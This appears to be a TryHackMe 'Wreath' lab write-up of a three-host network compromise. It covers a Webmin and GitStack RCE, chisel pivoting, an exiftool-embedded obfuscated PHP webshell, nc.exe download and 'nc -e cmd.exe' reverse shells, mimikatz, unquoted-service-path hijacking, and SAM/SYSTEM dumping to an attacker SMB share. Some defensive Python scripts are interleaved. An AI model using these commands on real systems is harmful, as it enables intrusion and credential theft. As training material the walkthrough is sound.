TryHackMe-Wreath
Background:
- There are three machines on the network
- At least one of them is a public-facing web server
- Somewhere on the network there is a self-hosted Git server
- The Git server is internal, so Thomas may well have pushed sensitive information to it
- One PC on the network runs antivirus software, which means it is most likely Windows
- It sounds as if this one is probably a Windows Server edition, which may work in our favour
- The Windows PC cannot be reached directly from the web server
Information gathering
nmap
└─# nmap -sC -sV 10.200.105.200
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-21 07:47 EDT
Nmap scan report for 10.200.105.200
Host is up (0.33s latency).
Not shown: 972 filtered tcp ports (no-response), 23 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 9c:1b:d4:b4:05:4d:88:99:ce:09:1f:c1:15:6a:d4:7e (RSA)
| 256 93:55:b4:d9:8b:70:ae:8e:95:0d:c2:b6:d2:03:89:a4 (ECDSA)
|_ 256 f0:61:5a:55:34:9b:b7:b8:3a:46:ca:7d:9f:dc:fa:12 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
|_http-title: Did not follow redirect to https://thomaswreath.thm
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-title: Thomas Wreath | Developer
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=thomaswreath.thm/organizationName=Thomas Wreath Development/stateOrProvinceName=East Riding Yorkshire/countryName=GB
| Not valid before: 2023-05-21T11:43:48
|_Not valid after: 2024-05-20T11:43:48
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.890
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.22 seconds
Add 10.200.105.200 thomaswreath.thm to /etc/hosts
Notes
Web
443 serves a personal page containing personal information
Port 10000 runs Webmin 1.89, a version affected by CVE-2019-15107
MiniServ: getting a shell
Googling MiniServ 1.89 turns up an RCE; GitHub exploit: https://github.com/MuirlandOracle/CVE-2019-15107, which lands directly as root
Send a reverse shell back to the local machine
Set up a tunnel with chisel
Transfer nmap over with curl and scan the internal IP range
./nmap -sP 10.200.105.0/24
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-05-22 12:17 BST
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-10-200-105-1.eu-west-1.compute.internal (10.200.105.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.18s latency).
MAC Address: 02:FE:CC:AF:62:61 (Unknown)
Nmap scan report for ip-10-200-105-100.eu-west-1.compute.internal (10.200.105.100)
Host is up (0.00016s latency).
MAC Address: 02:F8:2E:F3:7A:D1 (Unknown)
Nmap scan report for ip-10-200-105-150.eu-west-1.compute.internal (10.200.105.150)
Host is up (0.00017s latency).
Scan the open ports on host 150
Host is up (0.00052s latency).
Not shown: 14997 filtered ports
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
5985/tcp open wsman
MAC Address: 02:8C:A3:01:42:9F (Unknown)
Forward port 80 with chisel so it can be reached locally
GitStack: getting a shell
A leaked path gives direct access
searchsploit finds a GitStack 2.3.10 RCE; change the IP and port in the script and it runs commands
The .py file has already written a webshell to the web root, so it can be used directly
Now we need to get a shell back to our local machine, but there is a problem: this host does not talk to our Kali at all, only to the CentOS box on the LAN, so chisel can be used as a relay
First, the room hints that a rule must be added on CentOS to allow the port through: firewall-cmd --zone=public --add-port 15001/tcp
Transfer nc to CentOS and listen there, then have the webshell run PowerShell to bounce a shell back to CentOS
Add a user and RDP to the target host
Add a user and put it in the Administrators and Remote Management Users groups
PS C:\GitStack\gitphp> net user attack
net user attack
User name attack
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 22/05/2023 13:40:39
Password expires Never
Password changeable 22/05/2023 13:40:39
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
*Users
Global Group memberships *None
The command completed successfully.
Relay one more port with chisel and log in with evil-winrm
Or relay 3389 and connect with xfreerdp
Upload mimikatz.exe, either through evil-winrm or by mounting a shared drive over xfreerdp
xfreerdp /v:127.0.0.1 /u:hack /p:hack123 /cert-ignore /drive:share1,/home/ban/tools/test
Dump hashes
.\mimikatz.exe "privilege::debug" "lsadump::sam" exit
LSA Protection turns out to be enabled
Upload one more file and try
.\mimikatz.exe "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "sekurlsa::logonpasswords" exit
Still cannot get past it, so instead log in on 3389 with xfreerdp and right-click to run cmd as administrator
The target is now host 100; upload Invoke-Portscan.ps1 from Empire to scan its ports
Now we need to reach port 80 on 10.200.105.100, so a second-hop proxy is needed: kali - linux(200) - windows(150) - 100
On Windows, first allow the port through the firewall with netsh so the forward proxy can listen
netsh advfirewall firewall add rule name="chisel-readme" dir=in action=allow protocol=tcp localport=44455
Because Kali cannot talk to 150 directly, the Linux box must act as an intermediate forwarder, so that connecting to port 8005 on Kali is equivalent to connecting to port 44455 on 150
Kali connects forward through it
Setup complete; now to reach 100:80 we only need to configure the proxy in the browser
Or add a socks5 entry to proxychains
Search for website.git
Get-ChildItem -Path "C:\\" -Filter "*.git" -Recurse
Download it, then recover the source with git
Look at commit-meta.txt to work out the order of the git commits
separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"
The correct order is static --- Initial --- update; the latest version is 2-xx
Code review: file upload
There is an index.php under resources
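Reading each commit-meta.txt by eye works for three commits; the general way to recover the order is to follow the parent pointers. The script below does that, as an added example (my own code, not GitTools' and not part of the writeup). It assumes each N-<hash> directory holds a commit-meta.txt containing the raw commit object (tree, optional parent, author, committer, a blank line, then the message); the three commit contents below are constructed, with made-up hashes and the messages shortened to the words used above.

```python
"""Added example: put GitTools-extracted commits into history order by
following parent pointers instead of trusting the N-<hash> directory numbers."""
import re
from pathlib import Path

# Constructed sample, not the real repository: three commit-meta.txt contents
# keyed by the directory name GitTools' extractor would have created. Hashes
# and author details are made up; the directory numbers deliberately do not
# match the history order.
_AUTHOR = "Thomas <thomas@example.invalid>"
SAMPLE_COMMITS = {
    "0-" + "c" * 40: (
        "tree " + "3" * 40 + "\n"
        "parent " + "b" * 40 + "\n"
        f"author {_AUTHOR} 1600000200 +0100\n"
        f"committer {_AUTHOR} 1600000200 +0100\n"
        "\nupdate\n"
    ),
    "1-" + "a" * 40: (
        "tree " + "1" * 40 + "\n"
        f"author {_AUTHOR} 1600000000 +0100\n"
        f"committer {_AUTHOR} 1600000000 +0100\n"
        "\nstatic\n"
    ),
    "2-" + "b" * 40: (
        "tree " + "2" * 40 + "\n"
        "parent " + "a" * 40 + "\n"
        f"author {_AUTHOR} 1600000100 +0100\n"
        f"committer {_AUTHOR} 1600000100 +0100\n"
        "\nInitial\n"
    ),
}

_HEADER_RE = re.compile(r"^(tree|parent|author|committer) (.+)$")


def parse_commit_meta(text):
    """Return (parent hashes, message) from a raw commit object."""
    header, _, message = text.partition("\n\n")
    parents = []
    for line in header.splitlines():
        m = _HEADER_RE.match(line)
        if m and m.group(1) == "parent":
            parents.append(m.group(2).strip())
    return parents, message.strip()


def load_from_disk(extract_root):
    """Read every <dir>/commit-meta.txt under a GitTools extraction directory."""
    return {p.parent.name: p.read_text(errors="replace")
            for p in Path(extract_root).glob("*/commit-meta.txt")}


def order_commits(metas):
    """Oldest-to-newest list of (directory name, commit subject).

    Only a linear history is handled: a merge commit or a fork raises, which
    is the right signal to go back and look at the objects by hand."""
    by_hash = {}
    for dirname, text in metas.items():
        sha = dirname.split("-", 1)[1]          # "2-<hash>" -> "<hash>"
        parents, message = parse_commit_meta(text)
        subject = message.splitlines()[0] if message else ""
        by_hash[sha] = (dirname, parents, subject)

    children, roots = {}, []
    for sha, (_, parents, _) in by_hash.items():
        known = [p for p in parents if p in by_hash]   # ignore parents we never extracted
        if not known:
            roots.append(sha)
        for p in known:
            children.setdefault(p, []).append(sha)
    if len(roots) != 1:
        raise ValueError(f"expected one root commit, found {len(roots)}")

    ordered, cur = [], roots[0]
    while cur is not None:
        dirname, parents, subject = by_hash[cur]
        if len(parents) > 1:
            raise ValueError(f"merge commit {cur[:7]} not supported")
        ordered.append((dirname, subject))
        nxt = children.get(cur, [])
        if len(nxt) > 1:
            raise ValueError(f"history forks at {cur[:7]}")
        cur = nxt[0] if nxt else None
    return ordered


if __name__ == "__main__":
    for dirname, subject in order_commits(SAMPLE_COMMITS):
        print(f"{dirname[:9]}  {subject}")
```

On a real extraction, replace SAMPLE_COMMITS with load_from_disk("path/to/extracted") and the last entry printed is the tip, i.e. the version of the source to review.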
<?php
if(isset($_POST["upload"]) && is_uploaded_file($_FILES["file"]["tmp_name"])){
    $target = "uploads/".basename($_FILES["file"]["name"]);
    $goodExts = ["jpg", "jpeg", "png", "gif"];
    if(file_exists($target)){
        header("location: ./?msg=Exists");
        die();
    }
    $size = getimagesize($_FILES["file"]["tmp_name"]);
    if(!in_array(explode(".", $_FILES["file"]["name"])[1], $goodExts) || !$size){
        header("location: ./?msg=Fail");
        die();
    }
    move_uploaded_file($_FILES["file"]["tmp_name"], $target);
    header("location: ./?msg=Success");
    die();
} else if ($_SERVER["REQUEST_METHOD"] == "post"){
    header("location: ./?msg=Method");
}
if(isset($_GET["msg"])){
    $msg = $_GET["msg"];
    switch ($msg) {
        case "Success":
            $res = "File uploaded successfully!";
            break;
        case "Fail":
            $res = "Invalid File Type";
            break;
        case "Exists":
            $res = "File already exists";
            break;
        case "Method":
            $res = "No file send";
            break;
    }
}
?>
<!DOCTYPE html>
<html lang=en>
<!-- ToDo:
    - Finish the styling: it looks awful
    - Get Ruby more food. Greedy animal is going through it too fast
    - Upgrade the filter on this page. Can't rely on basic auth for everything
    - Phone Mrs Walker about the neighbourhood watch meetings
-->
<head>
    <title>Ruby Pictures</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" type="text/css" href="assets/css/Andika.css">
    <link rel="stylesheet" type="text/css" href="assets/css/styles.css">
</head>
<body>
    <main>
        <h1>Welcome Thomas!</h1>
        <h2>Ruby Image Upload Page</h2>
        <form method="post" enctype="multipart/form-data">
            <input type="file" name="file" id="fileEntry" required, accept="image/jpeg,image/png,image/gif">
            <input type="submit" name="upload" id="fileSubmit" value="Upload">
        </form>
        <p id=res><?php if (isset($res)){ echo $res; };?></p>
    </main>
</body>
</html>
The type filter only looks at the second dot-separated element of the file name (index 1 of explode), so a name like a.jpg.php passes the extension check while Apache still parses the file as PHP
if(!in_array(explode(".", $_FILES["file"]["name"])[1], $goodExts) || !$size){
    header("location: ./?msg=Fail");
    die();
}
getimagesize checks whether the file carries image dimensions to decide that it is an image, so a bare PHP file will not get through; copy a real image, rename it, and put the webshell into its Comment field so it is executed
$size = getimagesize($_FILES["file"]["tmp_name"]);
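To make the defect concrete, here is the page's extension check reproduced in Python next to a hardened version, as an added example (my own code, not part of the room or the site). flawed_ext_ok mirrors in_array(explode(".", $name)[1], $goodExts); hardened_ext_ok allow-lists only the final extension, rejects names with more than one dot and normalises case; safe_target_name and its random-name policy are my assumptions about what a fixed upload handler should do, not something the site does.

```python
"""Added example: the extension check from the reviewed upload page
(reproduced, flawed) beside a hardened replacement."""
import os
import secrets

GOOD_EXTS = {"jpg", "jpeg", "png", "gif"}


def flawed_ext_ok(filename: str) -> bool:
    """Mirror of the page's check: in_array(explode(".", $name)[1], $goodExts).

    Only the text between the first and second dot is examined, so
    a.jpg.php yields "jpg" and passes while the server still runs it as PHP."""
    parts = filename.split(".")
    if len(parts) < 2:
        return False          # PHP compares a missing index (null) and fails too
    return parts[1] in GOOD_EXTS


def hardened_ext_ok(filename: str) -> bool:
    """Allow-list the *last* extension, require exactly one dot, ignore case.

    Rejecting double extensions closes the a.jpg.php trick regardless of how
    the web server maps handlers onto extensions."""
    name = os.path.basename(filename)       # drop any directory components
    if name.count(".") != 1:
        return False
    stem, ext = name.rsplit(".", 1)
    return bool(stem) and ext.lower() in GOOD_EXTS


def safe_target_name(filename: str) -> str:
    """Assumed fixed policy: the server chooses the stored name, keeping only
    the validated extension, so the client never controls the path."""
    if not hardened_ext_ok(filename):
        raise ValueError("rejected upload name")
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ("ruby.jpg", "a.jpg.php", "shell.php", "RUBY.PNG"):
        print(f"{name:12} flawed={flawed_ext_ok(name)!s:5} hardened={hardened_ext_ok(name)}")
```

The extension check is only half of the fix. getimagesize proves the file parses as an image, but EXIF and JFIF comment fields are arbitrary attacker-supplied bytes, so a copied photo with a comment added still passes it; the usual remedies are to re-encode the image server-side (which discards metadata) and to store uploads where the PHP handler is not enabled.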
The resources page requires authentication; Thomas's password was already recovered from his NTLM hash earlier, so log in with it
Build the PHP. Per the earlier hint, host 100 runs AV, so uploading a shell outright would get it killed; upload a proof of concept first
./exiftool -Comment="<?php echo \"<pre>done and ok</pre>\"; die(); ?>" shell.jpeg.php
The upload succeeds and is parsed
Obfuscate the PHP to evade AV
Original PHP:
<?php
$cmd = $_GET["a"];
if(isset($cmd)){
    echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
Obfuscated with https://www.gaijin.at/en/tools/php-oabfuscator:
<?php $j0=$_GET["a"];if(isset($j0)){echo "<pre>".shell_exec($j0)."</pre>";}die();?>
./exiftool -Comment="<?php \$j0=\$_GET[\"a\"];if(isset(\$j0)){echo \"<pre>\".shell_exec(\$j0).\"</pre>\";}die();?>" shell.jpeg.php
Transfer it to host 150 and upload from there
Verified that host 100 can reach Kali, but Kali cannot ping the host, so only a reverse connection works
First upload the compiled nc
Open the port
netsh advfirewall firewall add rule name="chisel-readme" dir=in action=allow protocol=tcp localport=8080
Start an HTTP server with python2
Run from the webshell
curl http://10.200.73.150:8080/nc.exe -o c:\\windows\\temp\\nc-hack.exe
Run with PowerShell
powershell.exe c:\\windows\\temp\\nc-hack.exe 10.50.66.105 4446 -e cmd.exe
Reverse shell received
Privilege escalation via a writable service path
SeImpersonatePrivilege is present, so PrintSpoofer and the Potato family could be tried
Look for non-default services
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
One service's path is not wrapped in quotes
An unquoted service path attack can be tried
Check which account the service runs as
LocalSystem, i.e. SYSTEM privileges
Check the permissions on the service path
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
All local accounts have access
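The same finding can be made programmatically. As an added, defender-side example (my own code, not from the room), the script below parses the table that wmic service get name,displayname,pathname,startmode prints, flags services whose binary path is unquoted and contains spaces, and lists the locations Windows would probe before reaching the real executable, which are exactly the directories whose ACLs an administrator should confirm are not writable by standard users. The input is a constructed table that mimics wmic's fixed-width layout (wmic orders the columns alphabetically); the ExampleAgent and PlainToolSvc rows are made up, while the System Explorer row uses the path found above.

```python
"""Added example: find unquoted service paths in wmic output."""
import re

# Constructed sample mimicking wmic's fixed-width table (columns are
# alphabetical: DisplayName, Name, PathName, StartMode). Only the System
# Explorer row reflects a path from the writeup; the other two are invented.
_ROWS = [
    ("DisplayName", "Name", "PathName", "StartMode"),
    ("System Explorer Service", "SystemExplorerHelpService",
     r"C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe", "Auto"),
    ("Example Agent", "ExampleAgent",
     r'"C:\Program Files\Example Vendor\agent.exe" -service', "Auto"),
    ("Plain Tool Service", "PlainToolSvc", r"C:\Tools\svc.exe", "Manual"),
]
SAMPLE_WMIC = "\n".join(f"{a:<26}{b:<28}{c:<94}{d}" for a, b, c, d in _ROWS)


def parse_wmic_table(text):
    """Split wmic's table using the header's column start offsets.

    Slicing by offset is more robust than splitting on whitespace because
    values such as display names and paths contain spaces themselves."""
    lines = [ln.rstrip("\r") for ln in text.splitlines() if ln.strip()]
    header = lines[0]
    cols = [(m.group(0), m.start()) for m in re.finditer(r"\S+", header)]
    rows = []
    for line in lines[1:]:
        row = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            row[name] = line[start:end].strip()
        rows.append(row)
    return rows


def _executable_part(pathname):
    """Everything up to and including the first .exe (arguments excluded)."""
    p = pathname.strip()
    m = re.match(r"(.*?\.exe)", p, re.IGNORECASE)
    return m.group(1) if m else p


def is_unquoted_with_spaces(pathname):
    """True when the executable path is not quoted and contains a space."""
    p = pathname.strip()
    if not p or p.startswith('"'):
        return False
    return " " in _executable_part(p)


def candidate_paths(pathname):
    """Paths the service control manager would try before the real binary,
    one per space in the unquoted executable path."""
    exe = _executable_part(pathname)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def find_unquoted(text):
    """Return [(service name, path)] for every unquoted path with spaces."""
    return [(r["Name"], r["PathName"]) for r in parse_wmic_table(text)
            if is_unquoted_with_spaces(r["PathName"])]


if __name__ == "__main__":
    for name, path in find_unquoted(SAMPLE_WMIC):
        print(f"[!] {name}: {path}")
        for c in candidate_paths(path):
            print(f"    would probe: {c}")
```

To run it against a live host, save the wmic output to a file (it is UTF-16 on many systems, so open it with encoding="utf-16") and pass the text to find_unquoted; the fix on the service side is to quote the ImagePath and ensure the parent directories are writable only by administrators.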
So the plan is to replace SystemExplorerService64.exe with our own exe that sends back a reverse shell
Compile it
Transfer it straight into the directory with curl
curl http://10.200.73.150:8080/evil.exe -o evil.exe
First test whether evil.exe actually returns a shell
Then it is just a matter of swapping the binary
Stop the service first
sc stop SystemExplorerHelpService
Then replace it
copy evil.exe "C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe"
Listen on port 6667 to catch the shell
Start the service
Dump hashes via a temporary SMB share
Now try to dump the hashes of the current system, i.e. HKLM\SYSTEM and HKLM\SAM, which can be written straight to Kali through impacket-smbserver
Start a temporary SMB server
sudo python3 smbserver.py share . -smb2support -username user -password s3cureP@ssword
Authenticate
net use \\10.50.66.105\share /USER:user s3cureP@ssword
Dump SAM and SYSTEM and transfer them to the local machine
reg.exe save HKLM\SAM \\10.50.66.105\share\sam.bak
reg.exe save HKLM\SYSTEM \\10.50.66.105\share\system.bak
Extract the hashes with secretsdump.py
Done!